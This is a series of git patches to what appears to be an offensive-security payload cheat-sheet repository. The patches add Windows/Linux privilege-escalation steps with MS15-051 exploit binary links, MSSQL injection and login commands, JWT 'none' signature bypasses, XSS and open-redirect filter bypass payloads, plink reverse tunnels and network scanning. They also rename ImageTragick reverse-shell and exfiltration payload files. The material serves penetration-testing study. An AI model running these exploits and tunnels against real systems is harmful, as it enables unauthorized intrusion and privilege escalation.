--git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md index 12f24dca..e093f984 100644 --- a/Methodology and Resources/Windows - Privilege Escalation.md +++ b/Methodology and Resources/Windows - Privilege Escalation.md @@ -424,6 +424,7 @@ Scheduled tasks ```powershell schtasks /query /fo LIST 2>nul | findstr TaskName +schtasks /query /fo LIST /v > schtasks.txt; cat schtask.txt | grep "SYSTEM\|Task To Run" | grep -B 1 SYSTEM Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State ``` @@ -698,6 +699,7 @@ Get-Process wininit | Invoke-TokenManipulation -CreateProcess "Powershell.exe -n ### Juicy Potato (abusing the golden privileges) Binary available at : https://github.com/ohpe/juicy-potato/releases +:warning: Juicy Potato doesn't work in Windows Server 2019. 1. Check the privileges of the service account, you should look for **SeImpersonate** and/or **SeAssignPrimaryToken** (Impersonate a client after authentication) diff --git a/SQL Injection/MSSQL Injection.md b/SQL Injection/MSSQL Injection.md index 0061badc..fa30aa67 100644 --- a/SQL Injection/MSSQL Injection.md +++ b/SQL Injection/MSSQL Injection.md @@ -1,5 +1,23 @@ # MSSQL Injection +## Summary + +* [MSSQL comments](#mssql-comments) +* [MSSQL version](#mssql-version) +* [MSSQL database name](#mssql-database-name) +* [MSSQL List databases](#mssql-list-database) +* [MSSQL List columns](#mssql-list-columns) +* [MSSQL List tables](#mssql-list-tables) +* [MSSQL Extract user/password](#mssql-extract-user-password) +* [MSSQL Union Based](#mssql-union-based) +* [MSSQL Error Based](#mssql-error-based) +* [MSSQL Blind Based](#mssql-blind-based) +* [MSSQL Time Based](#mssql-time-based) +* [MSSQL Stacked query](#mssql-stack-query) +* [MSSQL Command execution](#mssql-command-execution) +* [MSSQL UNC path](#mssql-unc-path) +* [MSSQL Make user DBA](#mssql-make-user-dba) + ## MSSQL comments ```sql @@ -19,14 +37,14 @@ SELECT @@version SELECT DB_NAME() ``` -## MSSQL List Databases +## MSSQL List databases ```sql SELECT name FROM master..sysdatabases; SELECT DB_NAME(N); — for N = 0, 1, 2, … ``` -## MSSQL List Column +## MSSQL List columns ```sql SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = ‘mytable’); — for the current DB only @@ -35,7 +53,7 @@ SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master. SELECT table_catalog, column_name FROM information_schema.columns ``` -## MSSQL List Tables +## MSSQL List tables ```sql SELECT name FROM master..sysobjects WHERE xtype = ‘U’; — use xtype = ‘V’ for views @@ -45,7 +63,7 @@ SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master. SELECT table_catalog, table_name FROM information_schema.columns ``` -## MSSQL User Password +## MSSQL Extract user/password ```sql MSSQL 2000: @@ -137,6 +155,13 @@ EXEC sp_configure 'xp_cmdshell',1; RECONFIGURE; ``` +To interact with the MSSQL instance. + +```powershell +sqsh -S 192.168.1.X -U sa -P superPassword +python mssqlclient.py WORKGROUP/Administrator:password@192.168.1X -port 46758 +``` + ## MSSQL UNC Path MSSQL supports stacked queries so we can create a variable pointing to our IP address then use the `xp_dirtree` function to list the files in our SMB share and grab the NTLMv2 hash. diff --git a/SQL Injection/README.md b/SQL Injection/README.md index e238323a..8099f6df 100644 --- a/SQL Injection/README.md +++ b/SQL Injection/README.md @@ -52,6 +52,7 @@ Simple characters %3B ) Wildcard (*) +' # required for XML content ``` Multiple encoding From 3fd0791c2a864d9a077043d7b571a1a603b6db89 Mon Sep 17 00:00:00 2001 From: David B <44925796+TH3xACE@users.noreply.github.com> Date: Mon, 19 Aug 2019 00:55:30 +0200 Subject: [PATCH 043/222] Update Linux - Privilege Escalation.md Adding a tool that helps with privilege escalation on linux through SUDO. --- Methodology and Resources/Linux - Privilege Escalation.md | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/Methodology and Resources/Linux - Privilege Escalation.md b/Methodology and Resources/Linux - Privilege Escalation.md index e01d4be8..047a338f 100644 --- a/Methodology and Resources/Linux - Privilege Escalation.md +++ b/Methodology and Resources/Linux - Privilege Escalation.md @@ -20,6 +20,7 @@ - [BeRoot - Privilege Escalation Project - Windows / Linux / Mac](https://github.com/AlessandroZ/BeRoot) - [linuxprivchecker.py - a Linux Privilege Escalation Check Script](https://github.com/sleventyeleven/linuxprivchecker) - [unix-privesc-check - Automatically exported from code.google.com/p/unix-privesc-check](https://github.com/pentestmonkey/unix-privesc-check) +- [Privilege Escalation through sudo - Linux](https://github.com/TH3xACE/SUDO_KILLER) ## Summary @@ -309,6 +310,7 @@ uid=0(root) gid=1000(swissky) ``` ## SUDO +Tool: [Sudo Exploitation](https://github.com/TH3xACE/SUDO_KILLER) ### NOPASSWD @@ -662,4 +664,4 @@ https://www.exploit-db.com/exploits/18411 - [Privilege Escalation via lxd - @reboare](https://reboare.github.io/lxd/lxd-escape.html) - [Editing /etc/passwd File for Privilege Escalation - Raj Chandel - MAY 12, 2018](https://www.hackingarticles.in/editing-etc-passwd-file-for-privilege-escalation/) - [Privilege Escalation by injecting process possessing sudo tokens - @nongiach @chaignc](https://github.com/nongiach/sudo_inject) -* [Linux Password Security with pam_cracklib - Hal Pomeranz, Deer Run Associates](http://www.deer-run.com/~hal/sysadmin/pam_cracklib.html) \ No newline at end of file +* [Linux Password Security with pam_cracklib - Hal Pomeranz, Deer Run Associates](http://www.deer-run.com/~hal/sysadmin/pam_cracklib.html) From 6c161f26b23dc6ffeb0a3e6ebfc8b70333b60ce3 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Thu, 22 Aug 2019 23:03:48 +0200 Subject: [PATCH 044/222] JWT None alternative + MS15-051 --- JSON Web Token/README.md | 6 ++++++ .../Windows - Privilege Escalation.md | 18 ++++++++++++++++++ 2 files changed, 24 insertions(+) diff --git a/JSON Web Token/README.md b/JSON Web Token/README.md index 7452986a..9d83b6be 100644 --- a/JSON Web Token/README.md +++ b/JSON Web Token/README.md @@ -72,6 +72,12 @@ JWT Encoder – Decoder: `http://jsonwebtoken.io` JWT supports a None algorithm for signature. This was probably introduced to debug applications. However, this can have a severe impact on the security of the application. +None algorithm variants: +* none +* None +* NONE +* nOnE + To exploit this vulnerability, you just need to decode the JWT and change the algorithm used for the signature. Then you can submit your new JWT. However, this won't work unless you **remove** the signature diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md index e093f984..9401316f 100644 --- a/Methodology and Resources/Windows - Privilege Escalation.md +++ b/Methodology and Resources/Windows - Privilege Escalation.md @@ -25,6 +25,7 @@ * [MS08-067 (NetAPI)](#ms08-067-netapi) * [MS10-015 (KiTrap0D)](#ms10-015-kitrap0d---microsoft-windows-nt2000--2003--2008--xp--vista--7) * [MS11-080 (adf.sys)](#ms11-080-afd.sys---microsoft-windows-xp-2003) + * [MS15-051 (Client Copy Image)](#ms15-051---microsoft-windows-2003--2008--7--8--2012) * [MS16-032](#ms16-032---microsoft-windows-7--10--2008--2012-r2-x86x64) * [MS17-010 (Eternal Blue)](#ms17-010-eternal-blue) * [References](#references) @@ -775,6 +776,23 @@ Python: https://www.exploit-db.com/exploits/18176 Metasploit: exploit/windows/local/ms11_080_afdjoinleaf ``` +### MS15-051 (Client Copy Image) - Microsoft Windows 2003/2008/7/8/2012 + +```powershell +printf("[#] usage: ms15-051 command \n"); +printf("[#] eg: ms15-051 \"whoami /all\" \n"); + +# x32 +https://github.com/rootphantomer/exp/raw/master/ms15-051%EF%BC%88%E4%BF%AE%E6%94%B9%E7%89%88%EF%BC%89/ms15-051/ms15-051/Win32/ms15-051.exe + +# x64 +https://github.com/rootphantomer/exp/raw/master/ms15-051%EF%BC%88%E4%BF%AE%E6%94%B9%E7%89%88%EF%BC%89/ms15-051/ms15-051/x64/ms15-051.exe + +https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS15-051 +use exploit/windows/local/ms15_051_client_copy_image +``` + + ### MS16-032 - Microsoft Windows 7 < 10 / 2008 < 2012 R2 (x86/x64) Check if the patch is installed : `wmic qfe list | findstr "3139914"` From 7b6c8d46aac53aff8fcced7dfae9cded5343dd29 Mon Sep 17 00:00:00 2001 From: Jonathan Leitschuh Date: Wed, 28 Aug 2019 13:56:55 -0400 Subject: [PATCH 045/222] Add dot filter bypass with decimal IP --- XSS Injection/README.md | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/XSS Injection/README.md b/XSS Injection/README.md index 3a5a9f5b..6bd8aa15 100644 --- a/XSS Injection/README.md +++ b/XSS Injection/README.md @@ -557,6 +557,9 @@ You can bypass a single quote with ' in an on mousedown event handler ``` +Convert IP address into decimal format: IE. `http://192.168.1.1` == `http://3232235777` +http://www.geektools.com/cgi-bin/ipconv.cgi + ### Bypass parenthesis for string ```javascript @@ -1043,4 +1046,4 @@ anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxld - [App Maker and Colaboratory: two Google stored XSSes](https://ysx.me.uk/app-maker-and-colaboratory-a-stored-google-xss-double-bill/) - [XSS in www.yahoo.com](https://www.youtube.com/watch?v=d9UEVv3cJ0Q&feature=youtu.be) - [Stored XSS, and SSRF in Google using the Dataset Publishing Language](https://s1gnalcha0s.github.io/dspl/2018/03/07/Stored-XSS-and-SSRF-Google.html) -- [Stored XSS on Snapchat](https://medium.com/@mrityunjoy/stored-xss-on-snapchat-5d704131d8fd) \ No newline at end of file +- [Stored XSS on Snapchat](https://medium.com/@mrityunjoy/stored-xss-on-snapchat-5d704131d8fd) From bb305d0183f26a620893e13fa20a77ef44e7e2ab Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Thu, 29 Aug 2019 01:08:26 +0200 Subject: [PATCH 046/222] Network Discovery - Masscan update --- .../Metasploit - Cheatsheet.md | 11 +++++++++++ Methodology and Resources/Network Discovery.md | 17 +++++++++++++++-- .../Network Pivoting Techniques.md | 9 ++++++++- .../Windows - Privilege Escalation.md | 4 ++-- .../README.md | 0 .../imagemagik_ghostscript_reverse_shell.jpg | 0 ...mageover_file_exfiltration_pangu_wrapper.jpg | 0 ...imageover_file_exfiltration_text_wrapper.jpg | 0 ...1_payload_imageover_reverse_shell_devtcp.jpg | 0 ...load_imageover_reverse_shell_netcat_fifo.png | 0 .../imagetragik1_payload_imageover_wget.gif | 0 .../imagetragik1_payload_url_bind_shell_nc.mvg | 0 .../imagetragik1_payload_url_curl.png | 0 .../imagetragik1_payload_url_portscan.jpg | 0 ...agetragik1_payload_url_remote_connection.mvg | 0 ...getragik1_payload_url_reverse_shell_bash.mvg | 0 .../imagetragik1_payload_url_touch.jpg | 0 ..._payload_xml_reverse_shell_nctraditional.xml | 0 ...payload_xml_reverse_shell_netcat_encoded.xml | 0 .../imagetragik2_burpcollaborator_passwd.jpg | 0 .../imagetragik2_centos_id.jpg | 0 .../imagetragik2_ubuntu_id.jpg | 0 .../imagetragik2_ubuntu_shell.jpg | 0 .../imagetragik2_ubuntu_shell2.jpg | 0 24 files changed, 36 insertions(+), 5 deletions(-) rename Upload Insecure Files/{CVE Image Tragik => Picture Image Magik}/README.md (100%) rename Upload Insecure Files/{CVE Image Tragik => Picture Image Magik}/imagemagik_ghostscript_reverse_shell.jpg (100%) rename Upload Insecure Files/{CVE Image Tragik => Picture Image Magik}/imagetragik1_payload_imageover_file_exfiltration_pangu_wrapper.jpg (100%) rename Upload Insecure Files/{CVE Image Tragik => Picture Image Magik}/imagetragik1_payload_imageover_file_exfiltration_text_wrapper.jpg (100%) rename Upload Insecure Files/{CVE Image Tragik => Picture Image Magik}/imagetragik1_payload_imageover_reverse_shell_devtcp.jpg (100%) rename Upload Insecure Files/{CVE Image Tragik => Picture Image Magik}/imagetragik1_payload_imageover_reverse_shell_netcat_fifo.png (100%) rename Upload Insecure Files/{CVE Image Tragik => Picture Image Magik}/imagetragik1_payload_imageover_wget.gif (100%) rename Upload Insecure Files/{CVE Image Tragik => Picture Image Magik}/imagetragik1_payload_url_bind_shell_nc.mvg (100%) rename Upload Insecure Files/{CVE Image Tragik => Picture Image Magik}/imagetragik1_payload_url_curl.png (100%) rename Upload Insecure Files/{CVE Image Tragik => Picture Image Magik}/imagetragik1_payload_url_portscan.jpg (100%) rename Upload Insecure Files/{CVE Image Tragik => Picture Image Magik}/imagetragik1_payload_url_remote_connection.mvg (100%) rename Upload Insecure Files/{CVE Image Tragik => Picture Image Magik}/imagetragik1_payload_url_reverse_shell_bash.mvg (100%) rename Upload Insecure Files/{CVE Image Tragik => Picture Image Magik}/imagetragik1_payload_url_touch.jpg (100%) rename Upload Insecure Files/{CVE Image Tragik => Picture Image Magik}/imagetragik1_payload_xml_reverse_shell_nctraditional.xml (100%) rename Upload Insecure Files/{CVE Image Tragik => Picture Image Magik}/imagetragik1_payload_xml_reverse_shell_netcat_encoded.xml (100%) rename Upload Insecure Files/{CVE Image Tragik => Picture Image Magik}/imagetragik2_burpcollaborator_passwd.jpg (100%) rename Upload Insecure Files/{CVE Image Tragik => Picture Image Magik}/imagetragik2_centos_id.jpg (100%) rename Upload Insecure Files/{CVE Image Tragik => Picture Image Magik}/imagetragik2_ubuntu_id.jpg (100%) rename Upload Insecure Files/{CVE Image Tragik => Picture Image Magik}/imagetragik2_ubuntu_shell.jpg (100%) rename Upload Insecure Files/{CVE Image Tragik => Picture Image Magik}/imagetragik2_ubuntu_shell2.jpg (100%) diff --git a/Methodology and Resources/Metasploit - Cheatsheet.md b/Methodology and Resources/Metasploit - Cheatsheet.md index 4ce0db76..3fb5bad8 100644 --- a/Methodology and Resources/Metasploit - Cheatsheet.md +++ b/Methodology and Resources/Metasploit - Cheatsheet.md @@ -10,6 +10,7 @@ * [Meterpreter Webdelivery](#meterpreter-webdelivery) * [Get System](#get-system) * [Persistence Startup](#persistence-startup) + * [Network Monitoring](#network-monitoring) * [Portforward](#portforward) * [Upload / Download](#upload---download) * [Execute from Memory](#execute-from-memory) @@ -130,6 +131,16 @@ OPTIONS: meterpreter > run persistence -U -p 4242 ``` +### Network Monitoring + +```powershell +# list interfaces +run packetrecorder -li + +# record interface n°1 +run packetrecorder -i 1 +``` + ### Portforward ```powershell diff --git a/Methodology and Resources/Network Discovery.md b/Methodology and Resources/Network Discovery.md index ab07f1a4..10a6b63e 100644 --- a/Methodology and Resources/Network Discovery.md +++ b/Methodology and Resources/Network Discovery.md @@ -103,8 +103,21 @@ List Nmap scripts : ls /usr/share/nmap/scripts/ masscan -iL ips-online.txt --rate 10000 -p1-65535 --only-open -oL masscan.out masscan -e tun0 -p1-65535,U:1-65535 10.10.10.97 --rate 1000 -masscan --rate 500 --interface tap0 --router-ip $ROUTER_IP --top-ports 100 $NETWORK -oL masscan_machines.tmp -masscan --rate 1000 --interface tap0 --router-ip $ROUTER_IP -p1-65535,U:1-65535 $MACHINE_IP --banners -oL $MACHINE_IP/scans/masscan-ports.lst +# find machines on the network +sudo masscan --rate 500 --interface tap0 --router-ip $ROUTER_IP --top-ports 100 $NETWORK -oL masscan_machines.tmp +cat masscan_machines.tmp | grep open | cut -d " " -f4 | sort -u > masscan_machines.lst + +# find open ports for one machine +sudo masscan --rate 1000 --interface tap0 --router-ip $ROUTER_IP -p1-65535,U:1-65535 $MACHINE_IP --banners -oL $MACHINE_IP/scans/masscan-ports.lst + + +# TCP grab banners and services informations +TCP_PORTS=$(cat $MACHINE_IP/scans/masscan-ports.lst| grep open | grep tcp | cut -d " " -f3 | tr '\n' ',' | head -c -1) +[ "$TCP_PORTS" ] && sudo nmap -sT -sC -sV -v -Pn -n -T4 -p$TCP_PORTS --reason --version-intensity=5 -oA $MACHINE_IP/scans/nmap_tcp $MACHINE_IP + +# UDP grab banners and services informations +UDP_PORTS=$(cat $MACHINE_IP/scans/masscan-ports.lst| grep open | grep udp | cut -d " " -f3 | tr '\n' ',' | head -c -1) +[ "$UDP_PORTS" ] && sudo nmap -sU -sC -sV -v -Pn -n -T4 -p$UDP_PORTS --reason --version-intensity=5 -oA $MACHINE_IP/scans/nmap_udp $MACHINE_IP ``` ## Reconnoitre diff --git a/Methodology and Resources/Network Pivoting Techniques.md b/Methodology and Resources/Network Pivoting Techniques.md index 4f05b02e..ebc262ee 100644 --- a/Methodology and Resources/Network Pivoting Techniques.md +++ b/Methodology and Resources/Network Pivoting Techniques.md @@ -195,10 +195,17 @@ python client.py --server-ip [server ip] --server-port 9443 --ntlm-proxy-ip [pro ## plink ```powershell -plink -l root -pw toor ssh-server-ip -R 3390:127.0.0.1:3389 --> exposes the RDP port of the machine in the port 3390 of the SSH Server +# exposes the SMB port of the machine in the port 445 of the SSH Server +plink -l root -pw toor -R 445:127.0.0.1:445 +# exposes the RDP port of the machine in the port 3390 of the SSH Server +plink -l root -pw toor ssh-server-ip -R 3390:127.0.0.1:3389 + plink -l root -pw mypassword 192.168.18.84 -R plink.exe -v -pw mypassword user@10.10.10.10 -L 6666:127.0.0.1:445 + plink -R [Port to forward to on your VPS]:localhost:[Port to forward on your local machine] [VPS IP] +# redirects the Windows port 445 to Kali on port 22 +plink -P 22 -l root -pw some_password -C -R 445:127.0.0.1:445 192.168.12.185 ``` ## ngrok diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md index 9401316f..84d92b64 100644 --- a/Methodology and Resources/Windows - Privilege Escalation.md +++ b/Methodology and Resources/Windows - Privilege Escalation.md @@ -490,7 +490,8 @@ net start upnphost sc config upnphost depend="" ``` -Using [`accesschk`](https://web.archive.org/web/20080530012252/http://live.sysinternals.com/accesschk.exe) from Sysinternals. +Using [`accesschk`](https://web.archive.org/web/20080530012252/http://live.sysinternals.com/accesschk.exe) from Sysinternals or [accesschk-XP.exe - github.com/phackt](https://github.com/phackt/pentest/blob/master/privesc/windows/accesschk-XP.exe) + ```powershell $ accesschk.exe -uwcqv "Authenticated Users" * /accepteula RW SSDPSRV @@ -588,7 +589,6 @@ Check if these registry values are set to "1". ```bat $ reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated - $ reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated ``` diff --git a/Upload Insecure Files/CVE Image Tragik/README.md b/Upload Insecure Files/Picture Image Magik/README.md similarity index 100% rename from Upload Insecure Files/CVE Image Tragik/README.md rename to Upload Insecure Files/Picture Image Magik/README.md diff --git a/Upload Insecure Files/CVE Image Tragik/imagemagik_ghostscript_reverse_shell.jpg b/Upload Insecure Files/Picture Image Magik/imagemagik_ghostscript_reverse_shell.jpg similarity index 100% rename from Upload Insecure Files/CVE Image Tragik/imagemagik_ghostscript_reverse_shell.jpg rename to Upload Insecure Files/Picture Image Magik/imagemagik_ghostscript_reverse_shell.jpg diff --git a/Upload Insecure Files/CVE Image Tragik/imagetragik1_payload_imageover_file_exfiltration_pangu_wrapper.jpg b/Upload Insecure Files/Picture Image Magik/imagetragik1_payload_imageover_file_exfiltration_pangu_wrapper.jpg similarity index 100% rename from Upload Insecure Files/CVE Image Tragik/imagetragik1_payload_imageover_file_exfiltration_pangu_wrapper.jpg rename to Upload Insecure Files/Picture Image Magik/imagetragik1_payload_imageover_file_exfiltration_pangu_wrapper.jpg diff --git a/Upload Insecure Files/CVE Image Tragik/imagetragik1_payload_imageover_file_exfiltration_text_wrapper.jpg b/Upload Insecure Files/Picture Image Magik/imagetragik1_payload_imageover_file_exfiltration_text_wrapper.jpg similarity index 100% rename from Upload Insecure Files/CVE Image Tragik/imagetragik1_payload_imageover_file_exfiltration_text_wrapper.jpg rename to Upload Insecure Files/Picture Image Magik/imagetragik1_payload_imageover_file_exfiltration_text_wrapper.jpg diff --git a/Upload Insecure Files/CVE Image Tragik/imagetragik1_payload_imageover_reverse_shell_devtcp.jpg b/Upload Insecure Files/Picture Image Magik/imagetragik1_payload_imageover_reverse_shell_devtcp.jpg similarity index 100% rename from Upload Insecure Files/CVE Image Tragik/imagetragik1_payload_imageover_reverse_shell_devtcp.jpg rename to Upload Insecure Files/Picture Image Magik/imagetragik1_payload_imageover_reverse_shell_devtcp.jpg diff --git a/Upload Insecure Files/CVE Image Tragik/imagetragik1_payload_imageover_reverse_shell_netcat_fifo.png b/Upload Insecure Files/Picture Image Magik/imagetragik1_payload_imageover_reverse_shell_netcat_fifo.png similarity index 100% rename from Upload Insecure Files/CVE Image Tragik/imagetragik1_payload_imageover_reverse_shell_netcat_fifo.png rename to Upload Insecure Files/Picture Image Magik/imagetragik1_payload_imageover_reverse_shell_netcat_fifo.png diff --git a/Upload Insecure Files/CVE Image Tragik/imagetragik1_payload_imageover_wget.gif b/Upload Insecure Files/Picture Image Magik/imagetragik1_payload_imageover_wget.gif similarity index 100% rename from Upload Insecure Files/CVE Image Tragik/imagetragik1_payload_imageover_wget.gif rename to Upload Insecure Files/Picture Image Magik/imagetragik1_payload_imageover_wget.gif diff --git a/Upload Insecure Files/CVE Image Tragik/imagetragik1_payload_url_bind_shell_nc.mvg b/Upload Insecure Files/Picture Image Magik/imagetragik1_payload_url_bind_shell_nc.mvg similarity index 100% rename from Upload Insecure Files/CVE Image Tragik/imagetragik1_payload_url_bind_shell_nc.mvg rename to Upload Insecure Files/Picture Image Magik/imagetragik1_payload_url_bind_shell_nc.mvg diff --git a/Upload Insecure Files/CVE Image Tragik/imagetragik1_payload_url_curl.png b/Upload Insecure Files/Picture Image Magik/imagetragik1_payload_url_curl.png similarity index 100% rename from Upload Insecure Files/CVE Image Tragik/imagetragik1_payload_url_curl.png rename to Upload Insecure Files/Picture Image Magik/imagetragik1_payload_url_curl.png diff --git a/Upload Insecure Files/CVE Image Tragik/imagetragik1_payload_url_portscan.jpg b/Upload Insecure Files/Picture Image Magik/imagetragik1_payload_url_portscan.jpg similarity index 100% rename from Upload Insecure Files/CVE Image Tragik/imagetragik1_payload_url_portscan.jpg rename to Upload Insecure Files/Picture Image Magik/imagetragik1_payload_url_portscan.jpg diff --git a/Upload Insecure Files/CVE Image Tragik/imagetragik1_payload_url_remote_connection.mvg b/Upload Insecure Files/Picture Image Magik/imagetragik1_payload_url_remote_connection.mvg similarity index 100% rename from Upload Insecure Files/CVE Image Tragik/imagetragik1_payload_url_remote_connection.mvg rename to Upload Insecure Files/Picture Image Magik/imagetragik1_payload_url_remote_connection.mvg diff --git a/Upload Insecure Files/CVE Image Tragik/imagetragik1_payload_url_reverse_shell_bash.mvg b/Upload Insecure Files/Picture Image Magik/imagetragik1_payload_url_reverse_shell_bash.mvg similarity index 100% rename from Upload Insecure Files/CVE Image Tragik/imagetragik1_payload_url_reverse_shell_bash.mvg rename to Upload Insecure Files/Picture Image Magik/imagetragik1_payload_url_reverse_shell_bash.mvg diff --git a/Upload Insecure Files/CVE Image Tragik/imagetragik1_payload_url_touch.jpg b/Upload Insecure Files/Picture Image Magik/imagetragik1_payload_url_touch.jpg similarity index 100% rename from Upload Insecure Files/CVE Image Tragik/imagetragik1_payload_url_touch.jpg rename to Upload Insecure Files/Picture Image Magik/imagetragik1_payload_url_touch.jpg diff --git a/Upload Insecure Files/CVE Image Tragik/imagetragik1_payload_xml_reverse_shell_nctraditional.xml b/Upload Insecure Files/Picture Image Magik/imagetragik1_payload_xml_reverse_shell_nctraditional.xml similarity index 100% rename from Upload Insecure Files/CVE Image Tragik/imagetragik1_payload_xml_reverse_shell_nctraditional.xml rename to Upload Insecure Files/Picture Image Magik/imagetragik1_payload_xml_reverse_shell_nctraditional.xml diff --git a/Upload Insecure Files/CVE Image Tragik/imagetragik1_payload_xml_reverse_shell_netcat_encoded.xml b/Upload Insecure Files/Picture Image Magik/imagetragik1_payload_xml_reverse_shell_netcat_encoded.xml similarity index 100% rename from Upload Insecure Files/CVE Image Tragik/imagetragik1_payload_xml_reverse_shell_netcat_encoded.xml rename to Upload Insecure Files/Picture Image Magik/imagetragik1_payload_xml_reverse_shell_netcat_encoded.xml diff --git a/Upload Insecure Files/CVE Image Tragik/imagetragik2_burpcollaborator_passwd.jpg b/Upload Insecure Files/Picture Image Magik/imagetragik2_burpcollaborator_passwd.jpg similarity index 100% rename from Upload Insecure Files/CVE Image Tragik/imagetragik2_burpcollaborator_passwd.jpg rename to Upload Insecure Files/Picture Image Magik/imagetragik2_burpcollaborator_passwd.jpg diff --git a/Upload Insecure Files/CVE Image Tragik/imagetragik2_centos_id.jpg b/Upload Insecure Files/Picture Image Magik/imagetragik2_centos_id.jpg similarity index 100% rename from Upload Insecure Files/CVE Image Tragik/imagetragik2_centos_id.jpg rename to Upload Insecure Files/Picture Image Magik/imagetragik2_centos_id.jpg diff --git a/Upload Insecure Files/CVE Image Tragik/imagetragik2_ubuntu_id.jpg b/Upload Insecure Files/Picture Image Magik/imagetragik2_ubuntu_id.jpg similarity index 100% rename from Upload Insecure Files/CVE Image Tragik/imagetragik2_ubuntu_id.jpg rename to Upload Insecure Files/Picture Image Magik/imagetragik2_ubuntu_id.jpg diff --git a/Upload Insecure Files/CVE Image Tragik/imagetragik2_ubuntu_shell.jpg b/Upload Insecure Files/Picture Image Magik/imagetragik2_ubuntu_shell.jpg similarity index 100% rename from Upload Insecure Files/CVE Image Tragik/imagetragik2_ubuntu_shell.jpg rename to Upload Insecure Files/Picture Image Magik/imagetragik2_ubuntu_shell.jpg diff --git a/Upload Insecure Files/CVE Image Tragik/imagetragik2_ubuntu_shell2.jpg b/Upload Insecure Files/Picture Image Magik/imagetragik2_ubuntu_shell2.jpg similarity index 100% rename from Upload Insecure Files/CVE Image Tragik/imagetragik2_ubuntu_shell2.jpg rename to Upload Insecure Files/Picture Image Magik/imagetragik2_ubuntu_shell2.jpg From 72c54b5c1b6a4e0d535f397647a1f88a27bb9508 Mon Sep 17 00:00:00 2001 From: Alexandre ZANNI <16578570+noraj@users.noreply.github.com> Date: Thu, 29 Aug 2019 09:49:09 +0200 Subject: [PATCH 047/222] add missing backtick --- Methodology and Resources/Network Pivoting Techniques.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/Methodology and Resources/Network Pivoting Techniques.md b/Methodology and Resources/Network Pivoting Techniques.md index ebc262ee..90a60c0e 100644 --- a/Methodology and Resources/Network Pivoting Techniques.md +++ b/Methodology and Resources/Network Pivoting Techniques.md @@ -256,7 +256,7 @@ unzip ngrok-stable-linux-amd64.zip | :------------- | :------------------------------------------ | | ncat | `ncat localhost 8080 -c "ncat localhost 9090"` | | socat | `socat -v tcp-connect:localhost:8080,reuseaddr tcp-connect:localhost:9090` | -| remote host 1 | `ncat -l -p 8080 < file | +| remote host 1 | `ncat -l -p 8080 < file` | | remote host 2 | `ncat -l -p 9090 > newfile` | ## References @@ -265,4 +265,4 @@ unzip ngrok-stable-linux-amd64.zip * [Port Forwarding in Windows - Windows OS Hub](http://woshub.com/port-forwarding-in-windows/) * [Using the SSH "Konami Code" (SSH Control Sequences) - Jeff McJunkin](https://pen-testing.sans.org/blog/2015/11/10/protected-using-the-ssh-konami-code-ssh-control-sequences) * [A Red Teamer's guide to pivoting- Mar 23, 2017 - Artem Kondratenko](https://artkond.com/2017/03/23/pivoting-guide/) -* [Pivoting Meterpreter](https://www.information-security.fr/pivoting-meterpreter/) \ No newline at end of file +* [Pivoting Meterpreter](https://www.information-security.fr/pivoting-meterpreter/) From 0625e2aebfca40cd317dab7b69236a9165cd20db Mon Sep 17 00:00:00 2001 From: Ricardo Date: Fri, 30 Aug 2019 08:57:22 +0100 Subject: [PATCH 048/222] Add Host/Split Unicode Normalization Add Host/Split Exploitable Antipatterns in Unicode Normalization BH 2019 for filter bypass --- Open Redirect/README.md | 10 +++++++++- 1 file changed, 9 insertions(+), 1 deletion(-) diff --git a/Open Redirect/README.md b/Open Redirect/README.md index 0584673e..57365b08 100644 --- a/Open Redirect/README.md +++ b/Open Redirect/README.md @@ -114,6 +114,12 @@ http://www.yoursite.com/http://www.theirsite.com/ http://www.yoursite.com/folder/www.folder.com ``` +Host/Split Unicode Normalization +```powershell +https://evil.c℀.example.com . ---> https://evil.ca/c.example.com +http://a.com/X.b.com +``` + XSS from Open URL - If it's in a JS variable ```powershell @@ -169,4 +175,6 @@ http://www.example.com/redirect.php?url=javascript:prompt(1) * [OWASP - Unvalidated Redirects and Forwards Cheat Sheet](https://www.owasp.org/index.php/Unvalidated_Redirects_and_Forwards_Cheat_Sheet) * [Cujanovic - Open-Redirect-Payloads](https://github.com/cujanovic/Open-Redirect-Payloads) * [Pentester Land - Open Redirect Cheat Sheet](https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html) -* [Open Redirect Vulnerability - AUGUST 15, 2018 - s0cket7](https://s0cket7.com/open-redirect-vulnerability/) \ No newline at end of file +* [Open Redirect Vulnerability - AUGUST 15, 2018 - s0cket7](https://s0cket7.com/open-redirect-vulnerability/) +* [Host/Split +Exploitable Antipatterns in Unicode Normalization - BlackHat US 2019](https://i.blackhat.com/USA-19/Thursday/us-19-Birch-HostSplit-Exploitable-Antipatterns-In-Unicode-Normalization.pdf) From 3ca07aeb7af98d68357eef98ad18b4a445628694 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Fri, 30 Aug 2019 17:25:07 +0200 Subject: [PATCH 049/222] Docker Privesc - Unix socket --- .../Linux - Privilege Escalation.md | 7 +++++++ SQL Injection/MySQL Injection.md | 13 +++++++++++++ 2 files changed, 20 insertions(+) diff --git a/Methodology and Resources/Linux - Privilege Escalation.md b/Methodology and Resources/Linux - Privilege Escalation.md index 047a338f..e9d0aabc 100644 --- a/Methodology and Resources/Linux - Privilege Escalation.md +++ b/Methodology and Resources/Linux - Privilege Escalation.md @@ -574,6 